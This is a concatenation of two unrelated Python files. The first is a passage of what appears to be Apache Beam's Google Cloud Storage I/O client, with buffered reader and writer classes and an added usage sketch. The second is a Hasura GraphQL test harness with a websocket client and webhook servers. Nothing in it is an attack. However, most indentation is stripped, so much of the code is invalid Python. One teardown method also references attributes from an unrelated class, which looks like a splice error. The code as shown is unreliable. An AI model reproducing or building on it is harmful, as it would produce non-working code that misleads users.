http=httplib2.Http(timeout=DEFAULT_HTTP_TIMEOUT_SECONDS))
local_state.gcsio_instance = (
super(GcsIO, cls).__new__(cls, storage_client))
local_state.gcsio_instance.client = storage_client
return local_state.gcsio_instance
def __init__(self, storage_client=None):
# We must do this check on storage_client because the client attribute may
# have already been set in __new__ for the singleton case when
# storage_client is None.
if storage_client is not None:
self.client = storage_client
def open(self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
~exceptions.ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
return GcsBufferedReader(self.client, filename, mode=mode,
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
return GcsBufferedWriter(self.client, filename, mode=mode,
mime_type=mime_type)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def glob(self, pattern, limit=None):
"""Return the GCS path names matching a given path name pattern.
Path name patterns are those recognized by fnmatch.fnmatch(). The path
can contain glob characters (*, ?, and [...] sets).
Args:
pattern: GCS file path pattern in the form gs://<bucket>/<name_pattern>.
limit: Maximal number of path names to return.
All matching paths are returned if set to None.
Returns:
list of GCS file paths matching the given pattern.
"""
bucket, name_pattern = parse_gcs_path(pattern)
# Get the prefix with which we can list objects in the given bucket.
prefix = re.match('^[^[*?]*', name_pattern).group(0)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
object_paths = []
while True:
response = self.client.objects.List(request)
for item in response.items:
if fnmatch.fnmatch(item.name, name_pattern):
object_paths.append('gs://%s/%s' % (item.bucket, item.name))
if response.nextPageToken:
request.pageToken = response.nextPageToken
if limit is not None and len(object_paths) >= limit:
break
else:
break
return object_paths[:limit]
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES)
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(self, src, dest):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsCopyRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path)
try:
self.client.objects.Copy(request)
except HttpError as http_error:
if http_error.status_code == 404:
# This is a permanent error that should not be retried. Note that
# FileBasedSink.finalize_write expects an IOError when the source
# file does not exist.
raise GcsIOError(errno.ENOENT, 'Source file not found: %s' % src)
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(self, src_dest_pairs):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
batch_request = BatchApiRequest(
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES)
for src, dest in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsCopyRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path)
batch_request.Add(self.client.objects, 'Copy', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
src, dest = src_dest_pairs[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
result_statuses.append((src, dest, exception))
return result_statuses
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.glob(src + '*'):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size_of_files_in_glob(self, pattern, limit=None):
"""Returns the size of all the files in the glob as a dictionary
Args:
pattern: a file path pattern that reads the size of all the files
"""
bucket, name_pattern = parse_gcs_path(pattern)
# Get the prefix with which we can list objects in the given bucket.
prefix = re.match('^[^[*?]*', name_pattern).group(0)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
logging.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
if fnmatch.fnmatch(item.name, name_pattern):
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if limit is not None and counter >= limit:
break
if counter % 10000 == 0:
logging.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
if limit is not None and len(file_sizes) >= limit:
break
else:
break
    logging.info(
        "Finished the size estimation of the input at %s files. "
        "Estimation took %s seconds", counter, time.time() - start_time)
return file_sizes
# TODO: Consider using cStringIO instead of buffers and data_lists when reading.
class GcsBufferedReader(object):
"""A class for reading Google Cloud Storage files."""
def __init__(self,
client,
path,
mode='r',
buffer_size=DEFAULT_READ_BUFFER_SIZE,
segment_timeout=DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS):
self.client = client
self.path = path
self.bucket, self.name = parse_gcs_path(path)
self.mode = mode
self.buffer_size = buffer_size
self.segment_timeout = segment_timeout
# Get object state.
self.get_request = (storage.StorageObjectsGetRequest(
bucket=self.bucket, object=self.name))
try:
metadata = self._get_object_metadata(self.get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self.path)
else:
logging.error('HTTP error while requesting file %s: %s', self.path,
http_error)
raise
self.size = metadata.size
# Ensure read is from file of the correct generation.
self.get_request.generation = metadata.generation
# Initialize read buffer state.
self.download_stream = cStringIO.StringIO()
self.downloader = transfer.Download(
self.download_stream, auto_transfer=False, chunksize=self.buffer_size)
self.client.objects.Get(self.get_request, download=self.downloader)
self.position = 0
self.buffer = ''
self.buffer_start_position = 0
self.closed = False
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self.client.objects.Get(get_request)
def __iter__(self):
return self
  def __next__(self):
    """Read one line delimited by '\\n' from the file.
    """
    return self.next()  # delegate to next() rather than recursing via next(self)
def next(self):
"""Read one line delimited by '\\n' from the file.
"""
line = self.readline()
if not line:
raise StopIteration
return line
def read(self, size=-1):
"""Read data from a GCS file.
Args:
size: Number of bytes to read. Actual number of bytes read is always
equal to size unless EOF is reached. If size is negative or
unspecified, read the entire file.
Returns:
data read as str.
Raises:
IOError: When this buffer is closed.
"""
return self._read_inner(size=size, readline=False)
def readline(self, size=-1):
"""Read one line delimited by '\\n' from the file.
Mimics behavior of the readline() method on standard file objects.
A trailing newline character is kept in the string. It may be absent when a
file ends with an incomplete line. If the size argument is non-negative,
it specifies the maximum string size (counting the newline) to return.
A negative size is the same as unspecified. Empty string is returned
only when EOF is encountered immediately.
Args:
size: Maximum number of bytes to read. If not specified, readline stops
only on '\\n' or EOF.
Returns:
The data read as a string.
Raises:
IOError: When this buffer is closed.
"""
return self._read_inner(size=size, readline=True)
def _read_inner(self, size=-1, readline=False):
"""Shared implementation of read() and readline()."""
self._check_open()
if not self._remaining():
return ''
# Prepare to read.
data_list = []
if size is None:
size = -1
to_read = min(size, self._remaining())
if to_read < 0:
to_read = self._remaining()
break_after = False
while to_read > 0:
# If we have exhausted the buffer, get the next segment.
# TODO(ccy): We should consider prefetching the next block in another
# thread.
self._fetch_next_if_buffer_exhausted()
# Determine number of bytes to read from buffer.
buffer_bytes_read = self.position - self.buffer_start_position
bytes_to_read_from_buffer = min(
len(self.buffer) - buffer_bytes_read, to_read)
# If readline is set, we only want to read up to and including the next
# newline character.
if readline:
next_newline_position = self.buffer.find('\n', buffer_bytes_read,
len(self.buffer))
if next_newline_position != -1:
bytes_to_read_from_buffer = (
1 + next_newline_position - buffer_bytes_read)
break_after = True
# Read bytes.
data_list.append(self.buffer[buffer_bytes_read:buffer_bytes_read +
bytes_to_read_from_buffer])
self.position += bytes_to_read_from_buffer
to_read -= bytes_to_read_from_buffer
if break_after:
break
return ''.join(data_list)
def _fetch_next_if_buffer_exhausted(self):
if not self.buffer or (
self.buffer_start_position + len(self.buffer) <= self.position):
bytes_to_request = min(self._remaining(), self.buffer_size)
self.buffer_start_position = self.position
retry_count = 0
while retry_count <= 10:
queue = Queue.Queue()
t = threading.Thread(target=self._fetch_to_queue,
args=(queue, self._get_segment,
(self.position, bytes_to_request)))
t.daemon = True
t.start()
try:
result, exn, tb = queue.get(timeout=self.segment_timeout)
except Queue.Empty:
logging.warning(
('Timed out fetching %d bytes from position %d of %s after %f '
'seconds; retrying...'), bytes_to_request, self.position,
self.path, self.segment_timeout)
retry_count += 1
# Reinitialize download objects.
self.download_stream = cStringIO.StringIO()
self.downloader = transfer.Download(
self.download_stream, auto_transfer=False,
chunksize=self.buffer_size)
self.client.objects.Get(self.get_request, download=self.downloader)
continue
if exn:
logging.error(
('Exception while fetching %d bytes from position %d of %s: '
'%s\n%s'),
bytes_to_request, self.position, self.path, exn, tb)
raise exn
self.buffer = result
return
raise GcsIOError(
'Reached retry limit for _fetch_next_if_buffer_exhausted.')
def _fetch_to_queue(self, queue, func, args):
try:
value = func(*args)
queue.put((value, None, None))
except Exception as e: # pylint: disable=broad-except
tb = traceback.format_exc()
queue.put((None, e, tb))
def _remaining(self):
return self.size - self.position
def close(self):
"""Close the current GCS file."""
self.closed = True
self.download_stream = None
self.downloader = None
self.buffer = None
def _get_segment(self, start, size):
"""Get the given segment of the current GCS file."""
if size == 0:
return ''
# The objects self.downloader and self.download_stream may be recreated if
# this call times out; we save them locally to avoid any threading issues.
downloader = self.downloader
download_stream = self.download_stream
end = start + size - 1
downloader.GetRange(start, end)
value = download_stream.getvalue()
# Clear the cStringIO object after we've read its contents.
download_stream.truncate(0)
assert len(value) == size
return value
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
def seek(self, offset, whence=os.SEEK_SET):
"""Set the file's current offset.
    Note: if the new offset is out of bounds, it is adjusted to either 0 or EOF.
Args:
offset: seek offset as number.
whence: seek mode. Supported modes are os.SEEK_SET (absolute seek),
os.SEEK_CUR (seek relative to the current position), and os.SEEK_END
(seek relative to the end, offset should be negative).
Raises:
IOError: When this buffer is closed.
ValueError: When whence is invalid.
"""
self._check_open()
self.buffer = ''
self.buffer_start_position = -1
if whence == os.SEEK_SET:
self.position = offset
elif whence == os.SEEK_CUR:
self.position += offset
elif whence == os.SEEK_END:
self.position = self.size + offset
else:
raise ValueError('Whence mode %r is invalid.' % whence)
self.position = min(self.position, self.size)
self.position = max(self.position, 0)
def tell(self):
"""Tell the file's current offset.
Returns:
current offset in reading this file.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
return self.position
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return True
def readable(self):
return True
def writable(self):
return False
# TODO: Consider using cStringIO instead of buffers and data_lists when reading
# and writing.
class GcsBufferedWriter(object):
"""A class for writing Google Cloud Storage files."""
class PipeStream(object):
"""A class that presents a pipe connection as a readable stream."""
def __init__(self, recv_pipe):
self.conn = recv_pipe
self.closed = False
self.position = 0
self.remaining = ''
def read(self, size):
"""Read data from the wrapped pipe connection.
Args:
size: Number of bytes to read. Actual number of bytes read is always
equal to size unless EOF is reached.
Returns:
data read as str.
"""
data_list = []
bytes_read = 0
while bytes_read < size:
bytes_from_remaining = min(size - bytes_read, len(self.remaining))
data_list.append(self.remaining[0:bytes_from_remaining])
self.remaining = self.remaining[bytes_from_remaining:]
self.position += bytes_from_remaining
bytes_read += bytes_from_remaining
if not self.remaining:
try:
self.remaining = self.conn.recv_bytes()
except EOFError:
break
return ''.join(data_list)
def tell(self):
"""Tell the file's current offset.
Returns:
current offset in reading this file.
Raises:
IOError: When this stream is closed.
"""
self._check_open()
return self.position
def seek(self, offset, whence=os.SEEK_SET):
# The apitools.base.py.transfer.Upload class insists on seeking to the end
# of a stream to do a check before completing an upload, so we must have
# this no-op method here in that case.
if whence == os.SEEK_END and offset == 0:
return
elif whence == os.SEEK_SET and offset == self.position:
return
raise NotImplementedError
def _check_open(self):
if self.closed:
raise IOError('Stream is closed.')
def __init__(self,
client,
path,
mode='w',
mime_type='application/octet-stream'):
self.client = client
self.path = path
self.mode = mode
self.bucket, self.name = parse_gcs_path(path)
self.closed = False
self.position = 0
# A small buffer to avoid CPU-heavy per-write pipe calls.
self.write_buffer = bytearray()
self.write_buffer_size = 128 * 1024
# Set up communication with uploading thread.
parent_conn, child_conn = multiprocessing.Pipe()
self.child_conn = child_conn
self.conn = parent_conn
# Set up uploader.
self.insert_request = (storage.StorageObjectsInsertRequest(
bucket=self.bucket, name=self.name))
self.upload = transfer.Upload(
GcsBufferedWriter.PipeStream(child_conn),
mime_type,
chunksize=WRITE_CHUNK_SIZE)
self.upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self.upload_thread = threading.Thread(target=self._start_upload)
self.upload_thread.daemon = True
self.upload_thread.last_error = None
self.upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self.client.objects.Insert(self.insert_request, upload=self.upload)
except Exception as e: # pylint: disable=broad-except
logging.error('Error in _start_upload while inserting file %s: %s',
self.path, traceback.format_exc())
self.upload_thread.last_error = e
finally:
self.child_conn.close()
def write(self, data):
"""Write data to a GCS file.
Args:
data: data to write as str.
Raises:
IOError: When this buffer is closed.
"""
self._check_open()
if not data:
return
self.write_buffer.extend(data)
if len(self.write_buffer) > self.write_buffer_size:
self._flush_write_buffer()
self.position += len(data)
def flush(self):
"""Flushes any internal buffer to the underlying GCS file."""
self._check_open()
self._flush_write_buffer()
def tell(self):
"""Return the total number of bytes passed to write() so far."""
return self.position
def close(self):
"""Close the current GCS file."""
if self.closed:
logging.warn('Channel for %s is not open.', self.path)
return
self._flush_write_buffer()
self.closed = True
self.conn.close()
self.upload_thread.join()
# Check for exception since the last _flush_write_buffer() call.
if self.upload_thread.last_error:
raise self.upload_thread.last_error # pylint: disable=raising-bad-type
def __enter__(self):
return self
def __exit__(self, exception_type, exception_value, traceback):
self.close()
def _check_open(self):
if self.closed:
raise IOError('Buffer is closed.')
def seekable(self):
return False
def readable(self):
return False
def writable(self):
return True
def _flush_write_buffer(self):
try:
self.conn.send_bytes(buffer(self.write_buffer))
self.write_buffer = bytearray()
except IOError:
if self.upload_thread.last_error:
raise self.upload_thread.last_error # pylint: disable=raising-bad-type
else:
raise
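# --- Illustrative usage sketch added by the editor, not part of the original module ---
# A typical read/write round trip through this client. Running it for real requires
# service credentials discoverable by apache_beam.internal.gcp.auth and an existing
# bucket; the gs:// paths below are placeholders.
if __name__ == '__main__':
  gcs = GcsIO()
  with gcs.open('gs://my-bucket/tmp/example.txt', 'w') as f:
    f.write('hello from gcsio\n')
  with gcs.open('gs://my-bucket/tmp/example.txt') as f:
    logging.info('read back %d bytes', len(f.read()))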
|
context.py
|
#!/usr/bin/env python3
from http import HTTPStatus
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from ruamel.yaml.comments import CommentedMap as OrderedDict # to avoid '!!omap' in yaml
import threading
import http.server
import json
import queue
import socket
import subprocess
import time
import string
import random
import os
import re
import ruamel.yaml as yaml
import requests
import websocket
from sqlalchemy import create_engine
from sqlalchemy.schema import MetaData
import graphql_server
import graphql
# pytest has removed the global pytest.config
# As a workaround, we store it in PytestConf.config
class PytestConf():
pass
class HGECtxError(Exception):
pass
class GQLWsClient():
def __init__(self, hge_ctx, endpoint):
self.hge_ctx = hge_ctx
self.ws_queue = queue.Queue(maxsize=-1)
self.ws_url = urlparse(hge_ctx.hge_url)._replace(scheme='ws',
path=endpoint)
self.create_conn()
def create_conn(self):
self.ws_queue.queue.clear()
self.ws_id_query_queues = dict()
self.ws_active_query_ids = set()
self.connected_event = threading.Event()
self.init_done = False
self.is_closing = False
self.remote_closed = False
self._ws = websocket.WebSocketApp(self.ws_url.geturl(),
on_open=self._on_open, on_message=self._on_message, on_close=self._on_close)
self.wst = threading.Thread(target=self._ws.run_forever)
self.wst.daemon = True
self.wst.start()
def recreate_conn(self):
self.teardown()
self.create_conn()
def wait_for_connection(self, timeout=10):
assert not self.is_closing
assert self.connected_event.wait(timeout=timeout)
def get_ws_event(self, timeout):
return self.ws_queue.get(timeout=timeout)
def has_ws_query_events(self, query_id):
return not self.ws_id_query_queues[query_id].empty()
def get_ws_query_event(self, query_id, timeout):
return self.ws_id_query_queues[query_id].get(timeout=timeout)
def send(self, frame):
self.wait_for_connection()
if frame.get('type') == 'stop':
self.ws_active_query_ids.discard( frame.get('id') )
elif frame.get('type') == 'start' and 'id' in frame:
self.ws_id_query_queues[frame['id']] = queue.Queue(maxsize=-1)
self._ws.send(json.dumps(frame))
def init_as_admin(self):
headers={}
if self.hge_ctx.hge_key:
headers = {'x-hasura-admin-secret': self.hge_ctx.hge_key}
self.init(headers)
def init(self, headers={}):
payload = {'type': 'connection_init', 'payload': {}}
if headers and len(headers) > 0:
payload['payload']['headers'] = headers
self.send(payload)
ev = self.get_ws_event(3)
assert ev['type'] == 'connection_ack', ev
self.init_done = True
def stop(self, query_id):
data = {'id': query_id, 'type': 'stop'}
self.send(data)
self.ws_active_query_ids.discard(query_id)
def gen_id(self, size=6, chars=string.ascii_letters + string.digits):
new_id = ''.join(random.choice(chars) for _ in range(size))
if new_id in self.ws_active_query_ids:
return self.gen_id(size, chars)
return new_id
def send_query(self, query, query_id=None, headers={}, timeout=60):
graphql.parse(query['query'])
if headers and len(headers) > 0:
            # Do init if headers are provided
            self.init(headers)
        elif not self.init_done:
            self.init()
        if query_id is None:
query_id = self.gen_id()
frame = {
'id': query_id,
'type': 'start',
'payload': query,
}
self.ws_active_query_ids.add(query_id)
self.send(frame)
while True:
yield self.get_ws_query_event(query_id, timeout)
def _on_open(self):
if not self.is_closing:
self.connected_event.set()
def _on_message(self, message):
# NOTE: make sure we preserve key ordering so we can test the ordering
# properties in the graphql spec properly
json_msg = json.loads(message, object_pairs_hook=OrderedDict)
if 'id' in json_msg:
query_id = json_msg['id']
if json_msg.get('type') == 'stop':
#Remove from active queries list
self.ws_active_query_ids.discard( query_id )
            if query_id not in self.ws_id_query_queues:
                self.ws_id_query_queues[json_msg['id']] = queue.Queue(maxsize=-1)
            # Put event in the corresponding query queue
self.ws_id_query_queues[query_id].put(json_msg)
elif json_msg['type'] != 'ka':
#Put event in the main queue
self.ws_queue.put(json_msg)
def _on_close(self):
self.remote_closed = True
self.init_done = False
def teardown(self):
self.is_closing = True
if not self.remote_closed:
self._ws.close()
self.wst.join()
class ActionsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
self.req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(self.req_json))
if req_path == "/create-user":
resp, status = self.create_user()
self._send_response(status, resp)
elif req_path == "/create-users":
resp, status = self.create_users()
self._send_response(status, resp)
elif req_path == "/invalid-response":
self._send_response(HTTPStatus.OK, "some-string")
elif req_path == "/mirror-action":
resp, status = self.mirror_action()
self._send_response(status, resp)
elif req_path == "/get-user-by-email":
resp, status = self.get_users_by_email(True)
self._send_response(status, resp)
elif req_path == "/get-users-by-email":
resp, status = self.get_users_by_email(False)
self._send_response(status, resp)
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
def create_user(self):
email_address = self.req_json['input']['email']
name = self.req_json['input']['name']
if not self.check_email(email_address):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($email: String! $name: String!) {
insert_user_one(object: {email: $email, name: $name}){
id
}
}
'''
query = {
'query': gql_query,
'variables': {
'email': email_address,
'name': name
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user_one']
return response, HTTPStatus.OK
def create_users(self):
inputs = self.req_json['input']['users']
for input in inputs:
email_address = input['email']
if not self.check_email(email_address):
response = {
'message': 'Email address is not valid: ' + email_address,
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
mutation ($insert_inputs: [user_insert_input!]!){
insert_user(objects: $insert_inputs){
returning{
id
}
}
}
'''
query = {
'query': gql_query,
'variables': {
'insert_inputs': inputs
}
}
code, resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
response = resp['data']['insert_user']['returning']
return response, HTTPStatus.OK
def mirror_action(self):
response = self.req_json['input']['arg']
return response, HTTPStatus.OK
def get_users_by_email(self, singleUser = False):
email = self.req_json['input']['email']
if not self.check_email(email):
response = {
'message': 'Given email address is not valid',
'code': 'invalid-email'
}
return response, HTTPStatus.BAD_REQUEST
gql_query = '''
query get_user($email:String!) {
user(where:{email:{_eq:$email}},order_by: {id: asc}) {
id
}
}
'''
query = {
'query': gql_query,
'variables':{
'email':email
}
}
code,resp = self.execute_query(query)
if code != 200 or 'data' not in resp:
response = {
'message': 'GraphQL query execution failed',
'code': 'unexpected'
}
return response, HTTPStatus.BAD_REQUEST
if singleUser:
return resp['data']['user'][0], HTTPStatus.OK
else:
return resp['data']['user'], HTTPStatus.OK
def check_email(self, email):
        regex = r'^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$'
return re.search(regex,email)
def execute_query(self, query):
headers = {}
admin_secret = self.hge_ctx.hge_key
if admin_secret is not None:
headers['X-Hasura-Admin-Secret'] = admin_secret
code, resp, _ = self.hge_ctx.anyq('/v1/graphql', query, headers)
self.log_message(json.dumps(resp))
return code, resp
def _send_response(self, status, body):
self.log_request(status)
self.send_response_only(status)
self.send_header('Content-Type', 'application/json')
self.send_header('Set-Cookie', 'abcd')
self.end_headers()
self.wfile.write(json.dumps(body).encode("utf-8"))
class ActionsWebhookServer(http.server.HTTPServer):
def __init__(self, hge_ctx, server_address):
handler = ActionsWebhookHandler
handler.hge_ctx = hge_ctx
super().__init__(server_address, handler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
class EvtsWebhookHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(HTTPStatus.OK)
self.end_headers()
def do_POST(self):
content_len = self.headers.get('Content-Length')
req_body = self.rfile.read(int(content_len)).decode("utf-8")
req_json = json.loads(req_body)
req_headers = self.headers
req_path = self.path
self.log_message(json.dumps(req_json))
if req_path == "/fail":
self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_short":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.error_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
elif req_path == "/timeout_long":
time.sleep(5)
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
else:
self.send_response(HTTPStatus.NO_CONTENT)
self.end_headers()
self.server.resp_queue.put({"path": req_path,
"body": req_json,
"headers": req_headers})
# A very slightly more sane/performant http server.
# See: https://stackoverflow.com/a/14089457/176841
#
# TODO use this elsewhere, or better yet: use e.g. bottle + waitress
class ThreadedHTTPServer(ThreadingMixIn, http.server.HTTPServer):
"""Handle requests in a separate thread."""
class EvtsWebhookServer(ThreadedHTTPServer):
def __init__(self, server_address):
self.resp_queue = queue.Queue(maxsize=1)
self.error_queue = queue.Queue()
super().__init__(server_address, EvtsWebhookHandler)
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
def get_event(self, timeout):
return self.resp_queue.get(timeout=timeout)
def get_error_queue_size(self):
sz = 0
while not self.error_queue.empty():
self.error_queue.get()
sz = sz + 1
return sz
    def is_queue_empty(self):
        return self.resp_queue.empty()
def teardown(self):
self.evt_trggr_httpd.shutdown()
self.evt_trggr_httpd.server_close()
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.evt_trggr_web_server.join()
class HGECtxGQLServer:
def __init__(self, hge_urls, port=5000):
# start the graphql server
self.port = port
self._hge_urls = hge_urls
self.is_running = False
self.start_server()
def start_server(self):
if not self.is_running:
self.graphql_server = graphql_server.create_server('127.0.0.1', self.port)
self.hge_urls = graphql_server.set_hge_urls(self._hge_urls)
self.gql_srvr_thread = threading.Thread(target=self.graphql_server.serve_forever)
self.gql_srvr_thread.start()
self.is_running = True
def teardown(self):
self.stop_server()
def stop_server(self):
if self.is_running:
graphql_server.stop_server(self.graphql_server)
self.gql_srvr_thread.join()
self.is_running = False
class HGECtx:
def __init__(self, hge_url, pg_url, config):
self.http = requests.Session()
self.hge_key = config.getoption('--hge-key')
self.hge_url = hge_url
self.pg_url = pg_url
self.hge_webhook = config.getoption('--hge-webhook')
hge_jwt_key_file = config.getoption('--hge-jwt-key-file')
if hge_jwt_key_file is None:
self.hge_jwt_key = None
else:
with open(hge_jwt_key_file) as f:
self.hge_jwt_key = f.read()
self.hge_jwt_conf = config.getoption('--hge-jwt-conf')
if self.hge_jwt_conf is not None:
self.hge_jwt_conf_dict = json.loads(self.hge_jwt_conf)
self.webhook_insecure = config.getoption('--test-webhook-insecure')
self.metadata_disabled = config.getoption('--test-metadata-disabled')
self.may_skip_test_teardown = False
self.engine = create_engine(self.pg_url)
self.meta = MetaData()
self.ws_read_cookie = config.getoption('--test-ws-init-cookie')
